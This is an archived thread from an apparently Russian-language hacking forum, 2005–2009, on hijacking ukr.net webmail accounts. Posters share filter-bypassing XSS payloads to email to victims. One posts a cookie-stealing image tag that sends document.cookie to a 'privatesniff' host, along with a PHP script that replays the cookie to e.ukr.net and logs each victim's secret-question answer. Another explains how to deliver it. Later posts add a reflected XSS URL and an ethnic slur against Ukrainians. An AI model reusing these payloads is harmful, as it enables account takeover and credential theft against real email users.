PDA

Просмотр полной версии : ukr.net как?


Grema
02.12.2005, 00:19
www.ukr.net

Считываем ответ на секретный вопрос
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)

Dronga
02.12.2005, 04:20
ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!

Регистрация нового ящика доступна только с территории Украины.

То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.

NeMiNeM
02.12.2005, 16:35
Dronga
Логин - antichat@ukr.net
Пароль - abcde

Grema
Виложы до конца код!

Grema
02.12.2005, 17:16
я его отсюда взял http://antichat.ru/txt/hmail/


полный код

<embed src=javascript:this.wav>

FHT
02.12.2005, 17:45
www.ukr.net

Считываем ответ на секретный вопрос
<embed src=javasc
но как? и куда его пихать, расжите плиз, очень надо! =)
Дружище...Если ты его там взял то по ходу и прочитать должен был все...
Там все доходчиво описано...
Читай еще и еще и еще раз.
Пока не поймешь.

Dronga
03.12.2005, 15:54
Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
Теперь по делу.
На исследования ушло ровным счетом 7 минут. Диагноз:
Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
<img src=javascript:alert('ANTICHAT.RU');>(javascript в ASCII)
В общем, полноценная активная xss в теле письма найдена.

Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.

В дополнение ко всему мною были отмечены следущие особенности:
В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для antichat@ukr.net секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".

В общем, простор для творчества очень широкий.

Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. :cool:

Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).

Актуально под IE6 и Opera 8.51 (Другие не пробовал)

muse
28.12.2005, 15:21
ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??

PinkPanther
05.01.2006, 02:51
Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится.<img src="http://privatesniff/1.gif"style="background:white (http://privatesniff/1.gif) url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> <?
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n";
$header.="Referer: http://e.ukr.net\r\n";
$header.="Cookie: ".$query."\r\n";
$header.="Host: e.ukr.net\r\n\r\n";
$fp=fsockopen("e.ukr.net", 80);
fwrite($fp, $header);
$dt="";
while (!feof($fp))
$dt.=fread($fp, 1024);
$pass1=strpos($dt,'Password_Answer')+24;
$pass2=strpos($dt,'" size="40"><br><br></td>');
$length_pass=$pass2-$pass1;
$password=substr($dt,$pass1,$length_pass);
$f1=Fopen("password.html","a");
fwrite($f1,"$password<br /><hr>");
fclose($f1);
fclose($fp);
?>

Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.

ZiM
06.01.2006, 12:20
обясните плиз нешарящему, куда энто дело пихать?

PSalm69
06.01.2006, 13:44
обясните плиз нешарящему, куда энто дело пихать?
это посылаешь на мыло в письме жертве
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">

а код php сюда
_http:// privatesniff/s.php сюда

Dronga
06.01.2006, 14:31
Неплохо мы тут этот ukr.net разнесли) Хохлы.. В следующий раз сразу на наши условия соглашаться будут =) Хорошая тема. PinkPanther респект, но зря так выложил)

ZiM
06.01.2006, 16:49
а код php сюда
_http:// privatesniff/s.php сюда
как? :confused: я абсолютно нешарю, но очень хочу научится

<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">
то куда потом призодит отчет, на моё мло?

NeMiNeM
07.01.2006, 04:14
ZiM: забей.
<img src= ... "> уже не проходит.. Прикрыли.
Нужно искать новые уязвимости...

ZiM
07.01.2006, 16:00
жаль так хотелось мыло на нашем родном сервере хакнуть(

NeMiNeM
07.01.2006, 18:31
Угу, по-моему они прикрыли дыру, когда только Dronga выложил активную хсс и код алерта... Но я думаю там ещё можно покопатся и что-нибудь найти ;)

Jonathan Allen
07.01.2006, 20:01
<img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)">


Можно об этом по-подробнее? Потому, что на одном из интересующих меня операторов проходит

Майор
07.01.2006, 20:43
Вот рабочая XSS:
<img src=JaVaScRiPt:alert()>
Слово JaVaScRiPt написано разным регистром

geforse
22.05.2008, 18:45
Создайте ктонибудь почту на ukr.net

пожалуйста....

geforse
23.05.2008, 18:42
НУ ПОЖАЛУЙСТА....

echobyte
24.05.2008, 17:02
Создайте ктонибудь почту на ukr.net

пожалуйста....
PM

geforse
25.05.2008, 18:15
СПАСИБО!

BlackPanther
23.04.2009, 14:08
<XXS> passive
http://freemail.ukr.net/q/reg?lang=en&service=%22%3E%3Cscript%3Ealert(/BlackPanther/)%3C/script%3E